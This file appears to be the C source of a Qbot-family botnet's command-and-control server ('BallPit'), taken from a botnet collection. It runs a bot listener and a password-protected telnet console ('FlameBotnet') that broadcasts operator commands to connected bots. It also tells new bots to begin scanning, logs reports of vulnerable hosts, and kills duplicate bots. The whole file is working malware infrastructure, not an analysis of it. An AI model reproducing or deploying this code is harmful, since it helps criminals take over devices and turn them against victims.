Path: blob/master/Botnets/Qbot/BallPit Selfrep/server.c
5038 views
#include <stdio.h>1#include <stdlib.h>2#include <string.h>3#include <sys/types.h>4#include <sys/socket.h>5#include <netdb.h>6#include <unistd.h>7#include <time.h>8#include <fcntl.h>9#include <sys/epoll.h>10#include <errno.h>11#include <pthread.h>12#include <signal.h>1314#define MY_MGM_PASS "FlameBotnet"15#define MY_MGM_PORT 12381617#define MAXFDS 1000000 // No way we actually reach this amount. Ever.1819struct clientdata_t {20uint32_t ip;21char build[7];22char connected;23} clients[MAXFDS];24struct telnetdata_t {25int connected;26} managements[MAXFDS];27static volatile FILE *fileFD;28static volatile int epollFD = 0;29static volatile int listenFD = 0;30static volatile int managesConnected = 0;31int fdgets(unsigned char *buffer, int bufferSize, int fd)32{33int total = 0, got = 1;34while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }35return got;36}37void trim(char *str) // Remove whitespace from a string and properly null-terminate it.38{39int i;40int begin = 0;41int end = strlen(str) - 1;42while (isspace(str[begin])) begin++;43while ((end >= begin) && isspace(str[end])) end--;44for (i = begin; i <= end; i++) str[i - begin] = str[i];45str[i - begin] = '\0';46}474849static int make_socket_non_blocking (int sfd)50{ // man fcntl51int flags, s;52flags = fcntl (sfd, F_GETFL, 0);53if (flags == -1)54{55perror ("fcntl");56return -1;57}58flags |= O_NONBLOCK;59/*60F_SETFL (int)61Set the file status flags to the value specified by arg. File access mode (O_RDONLY, O_WRONLY, O_RDWR) and file creation flags (i.e., O_CREAT, O_EXCL, O_NOCTTY, O_TRUNC) in arg are62ignored. On Linux this command can change only the O_APPEND, O_ASYNC, O_DIRECT, O_NOATIME, and O_NONBLOCK flags.63*/64s = fcntl (sfd, F_SETFL, flags);65if (s == -1)66{67perror ("fcntl");68return -1;69}70return 0;71}727374static int create_and_bind (char *port)75{76struct addrinfo hints;77struct addrinfo *result, *rp;78int s, sfd;79memset (&hints, 0, sizeof (struct addrinfo));80hints.ai_family = AF_UNSPEC; /* Return IPv4 and IPv6 choices */81hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */82hints.ai_flags = AI_PASSIVE; /* All interfaces */83s = getaddrinfo (NULL, port, &hints, &result);84if (s != 0)85{86fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));87return -1;88}89for (rp = result; rp != NULL; rp = rp->ai_next)90{91sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);92if (sfd == -1) continue;93int yes = 1;94if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");95s = bind (sfd, rp->ai_addr, rp->ai_addrlen);96if (s == 0)97{98break;99}100close (sfd);101}102if (rp == NULL)103{104fprintf (stderr, "Could not bind\n");105return -1;106}107freeaddrinfo (result);108return sfd;109}110void broadcast(char *msg, int us) // sends message to all bots, notifies the management clients of this happening111{112int sendMGM = 1;113if(strcmp(msg, "PING") == 0) sendMGM = 0; // Don't send pings to management. Why? Because a human is going to ignore it.114char *wot = malloc(strlen(msg) + 10);115memset(wot, 0, strlen(msg) + 10);116strcpy(wot, msg);117trim(wot);118time_t rawtime;119struct tm * timeinfo;120time(&rawtime);121timeinfo = localtime(&rawtime);122char *timestamp = asctime(timeinfo);123trim(timestamp);124int i;125for(i = 0; i < MAXFDS; i++)126{127if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;128if(sendMGM && managements[i].connected)129{130send(i, "\x1b[33m", 5, MSG_NOSIGNAL);131send(i, timestamp, strlen(timestamp), MSG_NOSIGNAL);132send(i, ": ", 2, MSG_NOSIGNAL);133} //just a prompt with a timestamp.134printf("sent to fd: %d\n", i); // debug info, possibly also intrusion detection. Tells you when a management client connected on command line.135send(i, msg, strlen(msg), MSG_NOSIGNAL);136if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[31m> \x1b[0m", 13, MSG_NOSIGNAL); // send a cool looking prompt to a manager/admin137else send(i, "\n", 1, MSG_NOSIGNAL);138}139free(wot);140}141142void *epollEventLoop(void *useless) // the big loop used to control each bot asynchronously. Many threads of this get spawned.143{144struct epoll_event event;145struct epoll_event *events;146int s;147events = calloc (MAXFDS, sizeof event);148while (1)149{150int n, i;151n = epoll_wait (epollFD, events, MAXFDS, -1);152for (i = 0; i < n; i++)153{154if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))155{156clients[events[i].data.fd].connected = 0;157close(events[i].data.fd);158continue;159}160else if (listenFD == events[i].data.fd)161{162while (1)163{164struct sockaddr in_addr;165socklen_t in_len;166int infd, ipIndex;167168in_len = sizeof in_addr;169infd = accept (listenFD, &in_addr, &in_len); // accept a connection from a bot.170if (infd == -1)171{172if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;173else174{175perror ("accept");176break;177}178}179180clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;181182int dup = 0;183for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) // check for duplicate clients by seeing if any have the same IP as the one connecting184{185if(!clients[ipIndex].connected || ipIndex == infd) continue;186187if(clients[ipIndex].ip == clients[infd].ip)188{189dup = 1;190break;191}192}193194if(dup)195{196printf("dup client\n"); // warns the operator on command line197if(send(infd, "!* LOLNOGTFO\n", 13, MSG_NOSIGNAL) == -1) { close(infd); continue; } // orders all the bots to immediately kill themselves if we see a duplicate client! MAXIMUM PARANOIA198if(send(infd, "DUP\n", 4, MSG_NOSIGNAL) == -1) { close(infd); continue; } // same thing as above.199close(infd);200continue;201}202203s = make_socket_non_blocking (infd);204if (s == -1) { close(infd); break; }205206event.data.fd = infd;207event.events = EPOLLIN | EPOLLET;208s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);209if (s == -1)210{211perror ("epoll_ctl");212close(infd);213break;214}215216clients[infd].connected = 1;217send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);218}219continue;220}221else222{223int thefd = events[i].data.fd;224struct clientdata_t *client = &(clients[thefd]);225int done = 0;226client->connected = 1;227while (1)228{229ssize_t count;230char buf[2048];231memset(buf, 0, sizeof buf);232233while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)234{235if(strstr(buf, "\n") == NULL) { done = 1; break; }236trim(buf);237if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive238{239if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response240continue;241}242if(strstr(buf, "BUILD ") == buf)243{244char *build = strstr(buf, "BUILD ") + 6;245if(strlen(build) > 6) { printf("build bigger then 6\n"); done = 1; break; }246memset(client->build, 0, 7);247strcpy(client->build, build);248continue;249}250if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan251{252char *line = strstr(buf, "REPORT ") + 7;253fprintf(fileFD, "%s\n", line); // let's write it out to disk without checking what it is!254fflush(fileFD);255//TODO: automatically exploit that particular IP after scanning for dir and uploading correct arch stuffs.256continue;257}258if(strcmp(buf, "PONG") == 0)259{260//should really add some checking or something but meh261continue;262}263264printf("buf: \"%s\"\n", buf);265}266267if (count == -1)268{269if (errno != EAGAIN)270{271done = 1;272}273break;274}275else if (count == 0)276{277done = 1;278break;279}280}281282if (done)283{284client->connected = 0;285close(thefd);286}287}288}289}290}291292unsigned int clientsConnected() // counts the number of bots connected by looping over every possible file descriptor and checking if it's connected or not293{294int i = 0, total = 0;295for(i = 0; i < MAXFDS; i++)296{297if(!clients[i].connected) continue;298total++;299}300301return total;302}303304void *titleWriter(void *sock) // just an informational banner305{306// this LOOKS vulnerable, but it's actually not.307// there's no way we can have 2000 digits' worth of clients/bots connected to overflow that char array308int thefd = (int)sock;309char string[2048];310while(1)311{312memset(string, 0, 2048);313sprintf(string, "%c]0;Bots connected: %d | Clients connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');314// \007 is a bell character... causes a beep. Why is there a beep here?315if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;316317sleep(2);318}319}320321322void *telnetWorker(void *sock)323{324int thefd = (int)sock;325managesConnected++;326pthread_t title;327char buf[2048];328memset(buf, 0, sizeof buf);329330if(send(thefd, "password: ", 10, MSG_NOSIGNAL) == -1) goto end; /* failed to send... kill connection */331if(fdgets(buf, sizeof buf, thefd) < 1) goto end; /* no data, kill connection */332trim(buf);333if(strcmp(buf, MY_MGM_PASS) != 0) goto end; /* bad pass, kill connection */334memset(buf, 0, 2048);335if(send(thefd, "\033[1A", 4, MSG_NOSIGNAL) == -1) goto end;336pthread_create(&title, NULL, &titleWriter, sock); /* writes the informational banner to the admin after a login */337if(send(thefd, "\x1b[31m*****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;338if(send(thefd, "* WELCOME TO THE BALL PIT *\r\n", 43, MSG_NOSIGNAL) == -1) goto end;339if(send(thefd, "* Now with \x1b[32mFlameBotnet\x1b[31m support *\r\n", 53, MSG_NOSIGNAL) == -1) goto end;340if(send(thefd, "*****************************************\r\n\r\n> \x1b[0m", 51, MSG_NOSIGNAL) == -1) goto end;341/* If we can't send the useless banner, kill ourselves! Amazing error handling! */342managements[thefd].connected = 1;343344while(fdgets(buf, sizeof buf, thefd) > 0)345{346trim(buf);347if(send(thefd, "\x1b[31m> \x1b[0m", 11, MSG_NOSIGNAL) == -1) goto end;348if(strlen(buf) == 0) continue;349printf("management: \"%s\"\n", buf);350broadcast(buf, thefd); // take a command, send it to the bots351memset(buf, 0, 2048);352}353354end: // cleanup dead socket355managements[thefd].connected = 0;356close(thefd);357managesConnected--;358}359360void *telnetListener(void *useless)361{362int sockfd, newsockfd;363socklen_t clilen;364struct sockaddr_in serv_addr, cli_addr;365sockfd = socket(AF_INET, SOCK_STREAM, 0);366if (sockfd < 0) perror("ERROR opening socket");367bzero((char *) &serv_addr, sizeof(serv_addr));368serv_addr.sin_family = AF_INET;369serv_addr.sin_addr.s_addr = INADDR_ANY;370serv_addr.sin_port = htons(MY_MGM_PORT);371if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");372listen(sockfd,5);373clilen = sizeof(cli_addr);374while(1)375{376newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);377if (newsockfd < 0) perror("ERROR on accept");378pthread_t thread;379pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);380}381}382383int main (int argc, char *argv[])384{385signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel386387int s, threads;388struct epoll_event event;389390if (argc != 3)391{392fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);393exit (EXIT_FAILURE);394}395fileFD = fopen("output.txt", "a+"); // TOCTOU vuln if we have access to CnC396threads = atoi(argv[2]);397398listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't399if (listenFD == -1) abort ();400401s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't402if (s == -1) abort ();403404s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't405if (s == -1)406{407perror ("listen");408abort ();409}410411epollFD = epoll_create1 (0); // make an epoll listener, die if we can't412if (epollFD == -1)413{414perror ("epoll_create");415abort ();416}417418event.data.fd = listenFD;419event.events = EPOLLIN | EPOLLET;420s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);421if (s == -1)422{423perror ("epoll_ctl");424abort ();425}426427pthread_t thread[threads + 2];428while(threads--)429{430pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually431}432433pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);434435while(1)436{437broadcast("PING", -1); // ping bots every 60 sec on the main thread438439sleep(60);440}441442close (listenFD);443444return EXIT_SUCCESS;445}446447